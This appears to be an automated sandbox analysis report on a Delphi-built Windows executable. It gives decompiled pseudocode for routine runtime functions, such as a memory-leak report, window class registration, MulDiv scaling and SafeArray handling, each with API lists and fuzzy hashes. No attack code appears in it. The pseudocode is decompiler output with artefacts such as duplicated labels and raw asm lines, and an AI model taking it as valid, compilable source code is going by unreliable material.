            _v188 = 0xb;
            _t86 = *0x462dec; // 0x423568
            E00406740(_t86, &_v196);
            E0040C158(_t94, _v196, 1, _t110, _t112, 0, &_v192);
            E00404184();
        } else {
            _t109 = *0x4369e8; // 0x436a34
            if(E00403AB4(_t94, _t109) == 0) {
                goto L6;
            }
            _v116 = E004423F8(_t94);
        }
        goto L7;
    }
}


                                                                            APIs
                                                                            • GetClassInfoA.USER32 ref: 0043EB04
                                                                            • UnregisterClassA.USER32 ref: 0043EB2C
                                                                            • RegisterClassA.USER32 ref: 0043EB42
                                                                            • GetWindowLongA.USER32 ref: 0043EB7E
                                                                            • GetWindowLongA.USER32 ref: 0043EB93
                                                                            • SetWindowLongA.USER32(00000000,000000F4,00000000), ref: 0043EBA6
                                                                            Strings
                                                                            • h5B , xrefs: 0043EACB
                                                                            • 4jC , xrefs: 0043EA91
                                                                            • @ , xrefs: 0043EA79
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ClassLongWindow$InfoRegisterUnregister
                                                                            • String ID: 4jC$@$h5B
                                                                            • API String ID: 717780171-916785525
                                                                            • Opcode ID: 23814c8b448176fa15c958dc6a007fd35c890fe50a8182ec585c7e2c3e7324e2
                                                                            • Instruction ID: d23709e6df1bb4d3d126ec428beffe84ce2308d2414f8cb5aec67fee482d3fa9
                                                                            • Opcode Fuzzy Hash: 23814c8b448176fa15c958dc6a007fd35c890fe50a8182ec585c7e2c3e7324e2
                                                                            • Instruction Fuzzy Hash: E2518670A013449BDB21EB66CC81B9EB3E8BF48308F00456AF845E73D2DB38AD45CB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E0040C054(void* __edx, void* __edi, void* __fp0) {
    void _v1024;
    char _v1088;
    long _v1092;
    void* _t12;
    char* _t14;
    intOrPtr _t16;
    intOrPtr _t18;
    intOrPtr _t24;
    long _t32;

    E0040BECC(_t12, &_v1024, __edx, __fp0, 0x400);
    _t14 = *0x462e14; // 0x46304c
    if(*_t14 == 0) {
        _t16 = *0x462b88; // 0x40762c
        _t9 = _t16 + 4; // 0xffec
        _t18 = *0x4657f8; // 0x400000
        LoadStringA(E00405C64(_t18), *_t9, &_v1088, 0x40);
        return MessageBoxA(0, &_v1024, &_v1088, 0x2010);
    }
    _t24 = *0x462bec; // 0x46321c
    E00402E68(E004030B4(_t24));
    CharToOemA(&_v1024, &_v1024);
    _t32 = E00409008(&_v1024, __edi);
    WriteFile(GetStdHandle(0xfffffff4), &_v1024, _t32, &_v1092, 0);
    return WriteFile(GetStdHandle(0xfffffff4), E0040C118, "true", &_v1092, 0);
}


                                                                            APIs
                                                                              • Part of subcall function 0040BECC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040BEE9
                                                                              • Part of subcall function 0040BECC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040BF0D
                                                                              • Part of subcall function 0040BECC: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040BF28
                                                                              • Part of subcall function 0040BECC: LoadStringA.USER32 ref: 0040BFBE
                                                                            • CharToOemA.USER32 ref: 0040C08B
                                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040C0A8
                                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040C0AE
                                                                            • GetStdHandle.KERNEL32(000000F4,0040C118,?,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040C0C3
                                                                            • WriteFile.KERNEL32(00000000,000000F4,0040C118,?,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040C0C9
                                                                            • LoadStringA.USER32 ref: 0040C0EB
                                                                            • MessageBoxA.USER32 ref: 0040C101
                                                                            Strings
                                                                            • L0F , xrefs: 0040C068
                                                                            • ,v@ , xrefs: 0040C0D7
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                            • String ID: ,v@$L0F
                                                                            • API String ID: 185507032-114336920
                                                                            • Opcode ID: 07f17ca0095baed20458b404fad0876ad00edfc715b2c3dd6b064ac9ae374d2e
                                                                            • Instruction ID: 968c3332249ca419ab36ba5ff9e4d5e5c4f2a2f71d5e9e194e9044cb27fed959
                                                                            • Opcode Fuzzy Hash: 07f17ca0095baed20458b404fad0876ad00edfc715b2c3dd6b064ac9ae374d2e
                                                                            • Instruction Fuzzy Hash: F61154B1148204BAD200EB95CC86F8B77EC9B44704F40453BB755FA1D3DAB9E94487AB
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 98%
E0040262A(void* __eax) {
    void* _v8;
    char _v110600;
    char _v112644;
    char _v112645;
    signed int _v112652;
    char _v112653;
    char _v112654;
    char _v112660;
    intOrPtr _v112664;
    intOrPtr _v112668;
    intOrPtr _v112672;
    struct HWND__* _v112676;
    signed short* _v112680;
    intOrPtr* _v112684;
    char _v129068;
    char _v131117;
    char _v161836;
    void* _v162091;
    signed char _v162092;
    void* _t73;
    int _t79;
    signed int _t126;
    int _t131;
    intOrPtr _t132;
    char* _t134;
    char* _t135;
    char* _t136;
    char* _t137;
    char* _t138;
    char* _t139;
    char* _t141;
    char* _t142;
    char* _t147;
    char* _t148;
    intOrPtr _t180;
    void* _t182;
    void* _t184;
    void* _t185;
    intOrPtr* _t188;
    intOrPtr* _t189;
    signed int _t194;
    void* _t198;
    void* _t200;
    void* _t214;

    _t198 = _t200;
    _push(__eax);
    _t73 = 0x27;
    goto L2;
    L13:
    while(_t180 != 0x463708) {
        _t79 = E00402144(_t180);
        _t131 = _t79;
        __eflags = _t131;
        if(_t131 == 0) {
            L12:
            _t180 = *((intOrPtr*)(_t180 + 4));
            continue;
        } else {
            goto L5;
        }
        do {
            L5:
            _t194 = *(_t131 - 4);
            __eflags = _t194 & 0x00000001;
            if((_t194 & 0x00000001) == 0) {
                __eflags = _t194 & 0x00000004;
                if(__eflags == 0) {
                    __eflags = _v112652 - 0x1000;
                    if(_v112652 < 0x1000) {
                        _v112664 = (_t194 & 0xfffffff0) - 4;
                        _t126 = E00402488(_t131);
                        __eflags = _t126;
                        if(_t126 == 0) {
                            _v112645 = 0;
                            *((intOrPtr*)(_t198 + _v112652 * 4 - 0x1f828)) = _v112664;
                            _t18 = &_v112652;
                            *_t18 = _v112652 + 1;
                            __eflags = *_t18;
                        }
                    }
                } else {
                    E004024E0(_t131, __eflags, _t198);
                }
            }
            _t79 = E00402120(_t131);
            _t131 = _t79;
            __eflags = _t131;
        } while (_t131 != 0);
        goto L12;
    }
    _t132 = *0x4657b0; // 0x4657ac
    while(_t132 != 0x4657ac && _v112652 < 0x1000) {
        _t79 = E00402488(_t132 + 0x10);
        __eflags = _t79;
        if(_t79 == 0) {
            _v112645 = 0;
            _t22 = _t132 + 0xc; // 0x0
            _t79 = _v112652;
            *((intOrPtr*)(_t198 + _t79 * 4 - 0x1f828)) = (*_t22 & 0xfffffff0) - 0xfffffffffffffff4;
            _t27 = &_v112652;
            *_t27 = _v112652 + 1;
            __eflags = *_t27;
        }
        _t29 = _t132 + 4; // 0x4657ac
        _t132 = *_t29;
    }
    if(_v112645 != 0) {
        L49:
        return _t79;
    }
    _v112653 = 0;
    _v112668 = 0;
    _t134 = E004022DC(0x28, &_v161836);
    _v112660 = 0x37;
    _v112680 = 0x46103e;
    _v112684 = &_v110600;
    do {
        _v112672 = (*_v112680 & 0x0000ffff) - 4;
        _v112654 = 0;
        _t182 = 0xff;
        _t188 = _v112684;
        while(_t134 <= &_v131117) {
            if(*_t188 > 0) {
                if(_v112653 == 0) {
                    _t134 = E004022DC(0x27, _t134);
                    _v112653 = 1;
                }
                if(_v112654 != 0) {
                    *_t134 = 0x2c;
                    _t139 = _t134 + 1;
                    *_t139 = 0x20;
                    _t140 = _t139 + 1;
                    __eflags = _t139 + 1;
                } else {
                    *_t134 = 0xd;
                    *((char*)(_t134 + 1)) = 0xa;
                    _t147 = E004021C0(_v112668 + 1, _t134 + 2);
                    *_t147 = 0x20;
                    _t148 = _t147 + 1;
                    *_t148 = 0x2d;
                    *((char*)(_t148 + 1)) = 0x20;
                    _t140 = E004022DC(8, E004021C0(_v112672, _t148 + 2));
                    _v112654 = 1;
                }
                _t214 = _t182 - 1;
                if(_t214 < 0) {
                    _t141 = E004022DC(7, _t140);
                } else {
                    if(_t214 == 0) {
                        _t141 = E004022DC(6, _t140);
                    } else {
                        E00403808(*((intOrPtr*)(_t188 - 4)), &_v162092);
                        _t141 = E004022DC(_v162092 & 0x000000ff, _t140);
                    }
                }
                *_t141 = 0x20;
                _t142 = _t141 + 1;
                *_t142 = 0x78;
                *((char*)(_t142 + 1)) = 0x20;
                _t134 = E004021C0(*_t188, _t142 + 2);
            }
            _t182 = _t182 - 1;
            _t188 = _t188 - 8;
            if(_t182 != 0xffffffff) {
                continue;
            } else {
                goto L38;
            }
        }
        L38:
        _v112668 = _v112672;
        _v112684 = _v112684 + 0x800;
        _v112680 = &(_v112680[0x10]);
        _t60 = &_v112660;
        *_t60 = _v112660 - 1;
    } while (*_t60 != 0);
    if(_v112652 <= 0) {
        L48:
        E004022DC(3, _t134);
        _t79 = MessageBoxA(0, &_v161836, "Unexpected Memory Leak", 0x2010);
        goto L49;
    }
    if(_v112653 != 0) {
        *_t134 = 0xd;
        _t136 = _t134 + 1;
        *_t136 = 0xa;
        _t137 = _t136 + 1;
        *_t137 = 0xd;
        _t138 = _t137 + 1;
        *_t138 = 0xa;
        _t134 = _t138 + 1;
    }
    _t134 = E004022DC(0x3c, _t134);
    _t184 = _v112652 - 1;
    if(_t184 >= 0) {
        _t185 = _t184 + 1;
        _v112676 = 0;
        _t189 = &_v129068;
        L44:
        L44:
        if(_v112676 != 0) {
            *_t134 = 0x2c;
            _t135 = _t134 + 1;
            *_t135 = 0x20;
            _t134 = _t135 + 1;
        }
        _t134 = E004021C0(*_t189, _t134);
        if(_t134 > &_v131117) {
            goto L48;
        }
        _v112676 = &(_v112676->i);
        _t189 = _t189 + 4;
        _t185 = _t185 - 1;
        if(_t185 != 0) {
            goto L44;
        }
    }
    L2:
    _t200 = _t200 + 0xfffff004;
    _push(_t73);
    _t73 = _t73 - 1;
    if(_t73 != 0) {
        goto L2;
    } else {
        E00403264(&_v112644, 0x1b800);
        E00403264(&_v129068, 0x4000);
        _t79 = 0;
        _v112652 = 0;
        _v112645 = 1;
        _t180 = *0x46370c; // 0x26c0000
        goto L13;
    }
}


                                                                            Strings
                                                                            • 7 , xrefs: 0040279D
                                                                            • bytes: , xrefs: 00402859
                                                                            • The unexpected small block leaks are: , xrefs: 00402803
                                                                            • , xrefs: 00402910
                                                                            • An unexpected memory leak has occurred. , xrefs: 0040278C
                                                                            • The sizes of unexpected leaked medium and large blocks are: , xrefs: 00402945
                                                                            • Unexpected Memory Leak , xrefs: 004029BC
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                            • API String ID: 0-2723507874
                                                                            • Opcode ID: ab1744bc822241615f06664216cff9c599eaab7f23789ca155b362964788a165
                                                                            • Instruction ID: 232ad5794996384582659ab8687426251ae0ce960e01d4fcfe06ac857680b770
                                                                            • Opcode Fuzzy Hash: ab1744bc822241615f06664216cff9c599eaab7f23789ca155b362964788a165
                                                                            • Instruction Fuzzy Hash: E771C630B042588FDB21AA2DC988BD9B6E5EB09704F1441FBE049F73C2DBB949C5CB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E0043A624(intOrPtr* __eax, int __ecx, int __edx) {
    signed int _t62;
    signed int _t64;
    signed int _t65;
    signed char _t109;
    int _t121;
    intOrPtr* _t122;
    int _t123;
    int* _t125;

    *_t125 = __ecx;
    _t121 = __edx;
    _t122 = __eax;
    if(__edx == *_t125) {
        L29:
        _t62 = *0x43a7e0 & 0x000000ff;
        *(_t122 + 0x8c) = _t62;
        return _t62;
    }
    if(( *(__eax + 0x1c) & 0x00000001) == 0) {
        _t109 = *0x43a7d8 & 0x000000ff;
    } else {
        _t109 = *(__eax + 0x8c) & 0x000000ff;
    }
    if((_t109 & 0x00000001) == 0) {
        _t123 = *(_t122 + 0x40);
    } else {
        _t123 = MulDiv( *(_t122 + 0x40), _t121, *_t125);
    }
    if((_t109 & 0x00000002) == 0) {
        _t125[1] = *(_t122 + 0x44);
    } else {
        _t125[1] = MulDiv( *(_t122 + 0x44), _t121, *_t125);
    }
    if((_t109 & 0x00000004) == 0 || ( *(_t122 + 0x51) & 0x00000001) != 0) {
        _t64 = *(_t122 + 0x48);
        _t125[2] = _t64;
    } else {
        if((_t109 & 0x00000001) == 0) {
            _t64 = MulDiv( *(_t122 + 0x48), _t121, *_t125);
            _t125[2] = _t64;
        } else {
            _t64 = MulDiv( *(_t122 + 0x40) + *(_t122 + 0x48), _t121, *_t125) - _t123;
            _t125[2] = _t64;
        }
    }
    _t65 = _t64 & 0xffffff00 | (_t109 & 0x00000008) != 0x00000000;
    if(_t65 == 0 || ( *(_t122 + 0x51) & 0x00000002) != 0) {
        _t125[3] = *(_t122 + 0x4c);
    } else {
        if(_t65 == 0) {
            _t125[3] = MulDiv( *(_t122 + 0x44), _t121, *_t125);
        } else {
            _t125[3] = MulDiv( *(_t122 + 0x44) + *(_t122 + 0x4c), _t121, *_t125) - _t125[1];
        }
    }
    E0043A4D8(_t122, *_t125, _t121);
    *((intOrPtr*)( *_t122 + 0x88))(_t125[4], _t125[2]);
    if(( *0x43a7e0 & 0x000000ff) != (_t109 & *0x43a7dc)) {
        *(_t122 + 0x175) = MulDiv( *(_t122 + 0x175), _t121, *_t125);
    }
    if(( *0x43a7e0 & 0x000000ff) != (_t109 & *0x43a7e4)) {
        *(_t122 + 0x179) = MulDiv( *(_t122 + 0x179), _t121, *_t125);
    }
    if( *((char*)(_t122 + 0x59)) == 0 && (_t109 & 0x00000010) != 0) {
        E00425C2C( *((intOrPtr*)(_t122 + 0x68)), MulDiv(E00425C10( *((intOrPtr*)(_t122 + 0x68))), _t121, *_t125));
    }
    goto L29;
}

                                                                            APIs
                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043A65F
                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043A679
                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043A6A7
                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043A6BD
                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043A6F5
                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043A70D
                                                                              • Part of subcall function 00425C10: MulDiv.KERNEL32(00000000,00000048,?), ref: 00425C21
                                                                            • MulDiv.KERNEL32(?), ref: 0043A764
                                                                            • MulDiv.KERNEL32(?), ref: 0043A78E
                                                                            • MulDiv.KERNEL32(00000000), ref: 0043A7B4
                                                                              • Part of subcall function 00425C2C: MulDiv.KERNEL32(00000000,?,00000048), ref: 00425C39
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2325144a8e082e646bad59a138fd9ea4b37950158a0450446acd531626ff6a80
                                                                            • Instruction ID: 31ea7b08f01d562e4291b2201e28d04268924927301679854e288b517f7f1c2d
                                                                            • Opcode Fuzzy Hash: 2325144a8e082e646bad59a138fd9ea4b37950158a0450446acd531626ff6a80
                                                                            • Instruction Fuzzy Hash: FA513370644750AFC320EB69C885E6BB7F9AF49744F08581EF5D6C7361C739E8608B1A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 39%
E0043B5A8(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
    char _v5;
    struct HWND__* _v12;
    struct HDC__* _v16;
    void* _v20;
    intOrPtr _v24;
    intOrPtr _v28;
    int _v32;
    int _v36;
    int _t76;
    intOrPtr _t82;
    int _t85;
    void* _t90;
    int _t91;
    void* _t94;
    void* _t95;
    intOrPtr _t96;

    _t94 = _t95;
    _t96 = _t95 + 0xffffffe0;
    _v5 = __ecx;
    _t76 = *((intOrPtr*)( *__edx + 0x38))();
    if(_v5 == 0) {
        _push(__edx);
        asm("movsd");
        asm("movsd");
        asm("movsd");
        asm("movsd");
        _pop(_t90);
    } else {
        _push(__edx);
        asm("movsd");
        asm("movsd");
        asm("movsd");
        asm("movsd");
        _pop(_t90);
    }
    _v12 = GetDesktopWindow();
    _v16 = GetDCEx(_v12, 0, 0x402);
    _push(_t94);
    _push(0x43b6c3);
    _push( *[fs:eax]);
    *[fs:eax] = _t96;
    _v20 = SelectObject(_v16, E004261BC( *((intOrPtr*)(_t90 + 0x48))));
    _t91 = _v36;
    _t85 = _v32;
    PatBlt(_v16, _t91 + _t76, _t85, _v28 - _t91 - _t76, _t76, 0x5a0049);
    PatBlt(_v16, _v28 - _t76, _t85 + _t76, _t76, _v24 - _t85 - _t76, 0x5a0049);
    PatBlt(_v16, _t91, _v24 - _t76, _v28 - _v36 - _t76, _t76, 0x5a0049);
    PatBlt(_v16, _t91, _t85, _t76, _v24 - _v32 - _t76, 0x5a0049);
    SelectObject(_v16, _v20);
    _pop(_t82);
    *[fs:eax] = _t82;
    _push(0x43b6ca);
    return ReleaseDC(_v12, _v16);
}

                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 0043B5DF
                                                                            • GetDCEx.USER32(?,00000000,00000402), ref: 0043B5F2
                                                                            • SelectObject.GDI32(?,00000000), ref: 0043B615
                                                                            • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0043B63B
                                                                            • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0043B65D
                                                                            • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0043B67C
                                                                            • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0043B696
                                                                            • SelectObject.GDI32(?,?), ref: 0043B6A3
                                                                            • ReleaseDC.USER32 ref: 0043B6BD
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ObjectSelect$DesktopReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 1187665388-0
                                                                            • Opcode ID: b2c602b1dc45e199638d733ea000c6a1b9b22f9762cdf267a88b65931b3f431e
                                                                            • Instruction ID: 4169a8a6f7cde27594b8dc9ea805dfdf28c36229a5204248b9e0b1c31a3baf9f
                                                                            • Opcode Fuzzy Hash: b2c602b1dc45e199638d733ea000c6a1b9b22f9762cdf267a88b65931b3f431e
                                                                            • Instruction Fuzzy Hash: 6F31FB76A00219BFDB01DEEDCC85EAFBBBCEF09704B414569B504F7281C679AD048BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 77%
E0040FAE0(short* __eax, intOrPtr __ecx, signed short* __edx) {
    char _v260;
    char _v768;
    char _v772;
    short* _v776;
    intOrPtr _v780;
    char _v784;
    signed int _v788;
    signed short* _v792;
    char _v796;
    char _v800;
    intOrPtr* _v804;
    void* __ebp;
    signed char _t47;
    signed int _t54;
    void* _t62;
    intOrPtr* _t73;
    signed short* _t91;
    void* _t93;
    void* _t95;
    void* _t98;
    void* _t99;
    intOrPtr* _t108;
    void* _t112;
    intOrPtr _t113;
    char* _t114;
    void* _t115;

    _t100 = __ecx;
    _v780 = __ecx;
    _t91 = __edx;
    _v776 = __eax;
    if(( *(__edx + 1) & 0x00000020) == 0) {
        E0040F688(0x80070057);
    }
    _t47 = *_t91 & 0x0000ffff;
    if((_t47 & 0x00000fff) != 0xc) {
        _push(_t91);
        _push(_v776);
        L0040E2AC();
        return E0040F688(_v776);
    } else {
        if((_t47 & 0x00000040) == 0) {
            _v792 = _t91[4];
        } else {
            _v792 = *(_t91[4]);
        }
        _v788 = *_v792 & 0x0000ffff;
        _t93 = _v788 - 1;
        if(_t93 < 0) {
            L9:
            _push( &_v772);
            _t54 = _v788;
            _push(_t54);
            _push(0xc);
            L0040E70C();
            _t113 = _t54;
            if(_t113 == 0) {
                E0040F3E0(_t100);
            }
            E0040FA38(_v776);
            *_v776 = 0x200c;
            *((intOrPtr*)(_v776 + 8)) = _t113;
            _t95 = _v788 - 1;
            if(_t95 < 0) {
                L14:
                _t97 = _v788 - 1;
                if(E0040FA54(_v788 - 1, _t115) != 0) {
                    L0040E744();
                    E0040F688(_v792);
                    L0040E744();
                    E0040F688( &_v260);
                    _v780(_t113, &_v260, &_v800, _v792, &_v260, &_v796);
                }
                _t62 = E0040FA84(_t97, _t115);
            } else {
                _t98 = _t95 + 1;
                _t73 = &_v768;
                _t108 = &_v260;
                do {
                    *_t108 = *_t73;
                    _t108 = _t108 + 4;
                    _t73 = _t73 + 8;
                    _t98 = _t98 - 1;
                } while (_t98 != 0);
                do {
                    goto L14;
                } while (_t62 != 0);
                return _t62;
            }
        } else {
            _t99 = _t93 + 1;
            _t112 = 0;
            _t114 = &_v772;
            do {
                _v804 = _t114;
                _push(_v804 + 4);
                _t18 = _t112 + 1; // 0x1
                _push(_v792);
                L0040E714();
                E0040F688(_v792);
                _push( &_v784);
                _t21 = _t112 + 1; // 0x1
                _push(_v792);
                L0040E71C();
                E0040F688(_v792);
                *_v804 = _v784 - *((intOrPtr*)(_v804 + 4)) + 1;
                _t112 = _t112 + 1;
                _t114 = _t114 + 8;
                _t99 = _t99 - 1;
            } while (_t99 != 0);
            goto L9;
        }
    }
}

                                                                            APIs
                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040FB79
                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040FB95
                                                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040FBCE
                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040FC4B
                                                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040FC64
                                                                            • VariantCopy.OLEAUT32(?), ref: 0040FC99
                                                                            Strings
                                                                            • , xrefs: 0040FAFA
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                            • String ID:
                                                                            • API String ID: 351091851-3916222277
                                                                            • Opcode ID: 1259071905c284c690569f5ebbe38a6ff0448cf178a14f89c988a819c5d5ab72
                                                                            • Instruction ID: e8b17cf1572734a03829fa1d627ab26794180486a0a47edda1f815aa89ecf2ba
                                                                            • Opcode Fuzzy Hash: 1259071905c284c690569f5ebbe38a6ff0448cf178a14f89c988a819c5d5ab72
                                                                            • Instruction Fuzzy Hash: 38513E7590021D9BCB22DB59C891AD9B3BCAF0C304F4045FAE908F7641D638AF858F65
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 004584CC: GetActiveWindow.USER32 ref: 004584F3
                                                                              • Part of subcall function 004584CC: GetLastActivePopup.USER32(?), ref: 00458505
                                                                            • GetWindowRect.USER32 ref: 004571A2
                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 004571DA
                                                                            • MessageBoxA.USER32 ref: 00457219
                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0045728F,?,00000000,00457288), ref: 00457269
                                                                            • SetActiveWindow.USER32(00000000,0045728F,?,00000000,00457288), ref: 0045727A
                                                                            Strings
                                                                            • ( , xrefs: 0045717F
                                                                            • cF , xrefs: 0045718E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Window$Active$LastMessagePopupRect
                                                                            • String ID: cF$(
                                                                            • API String ID: 3456420849-2654615770
                                                                            • Opcode ID: 8ffb3ed4ba807d08fbadb44ba06598bdbe1bc9adf50b3b3d853d5f2a8d08e838
                                                                            • Instruction ID: e3fa6410cbb3c08fe700889c1ec58b143b8f2f9b644a860e070ba4dfd1801142
                                                                            • Opcode Fuzzy Hash: 8ffb3ed4ba807d08fbadb44ba06598bdbe1bc9adf50b3b3d853d5f2a8d08e838
                                                                            • Instruction Fuzzy Hash: E1511875E04108AFDB44DBA9DD81FAEB7B9FB48301F1445AAF900EB392D678AD048B54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 71%
                                                                            E0042048C(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                char _v5;
                                                                                intOrPtr* _v12;
                                                                                long _v16;
                                                                                char _v20;
                                                                                char _v24;
                                                                                long _t22;
                                                                                char _t29;
                                                                                void* _t53;
                                                                                intOrPtr _t61;
                                                                                intOrPtr* _t62;
                                                                                intOrPtr _t63;
                                                                                intOrPtr _t66;
                                                                                intOrPtr _t67;
                                                                                void* _t72;
                                                                                void* _t73;
                                                                                intOrPtr _t74;

                                                                                _t72 = _t73;
                                                                                _t74 = _t73 + 0xffffffec;
                                                                                _push(__esi);
                                                                                _push(__edi);
                                                                                _t53 = __eax;
                                                                                _t22 = GetCurrentThreadId();
                                                                                _t62 = *0x462f38; // 0x463034
                                                                                if(_t22 != *_t62) {
                                                                                    _v24 = GetCurrentThreadId();
                                                                                    _v20 = 0;
                                                                                    _t61 = *0x462da0; // 0x416108
                                                                                    E0040C214(_t53, _t61, 1, __edi, __esi, 0, &_v24);
                                                                                    E00404184();
                                                                                }
                                                                                if(_t53 <= 0) {
                                                                                    E00420464();
                                                                                } else {
                                                                                    E00420470(_t53);
                                                                                }
                                                                                _v16 = 0;
                                                                                EnterCriticalSection(0x4662e8);
                                                                                _push(_t72);
                                                                                _push(0x420651);
                                                                                _push( *[fs:eax]);
                                                                                *[fs:eax] = _t74;
                                                                                _v16 = InterlockedExchange( &E00461BEC, _v16);
                                                                                _push(_t72);
                                                                                _push(0x420632);
                                                                                _push( *[fs:eax]);
                                                                                *[fs:eax] = _t74;
                                                                                if(_v16 == 0 || *((intOrPtr*)(_v16 + 8)) <= 0) {
                                                                                    _t29 = 0;
                                                                                } else {
                                                                                    _t29 = 1;
                                                                                }
                                                                                _v5 = _t29;
                                                                                if(_v5 == 0) {
                                                                                    L15:
                                                                                    _pop(_t63);
                                                                                    *[fs:eax] = _t63;
                                                                                    _push(E00420639);
                                                                                    return E00403928(_v16);
                                                                                } else {
                                                                                    if( *((intOrPtr*)(_v16 + 8)) > 0) {
                                                                                        _v12 = E0041A80C(_v16, 0);
                                                                                        E0041A6F8(_v16, 0);
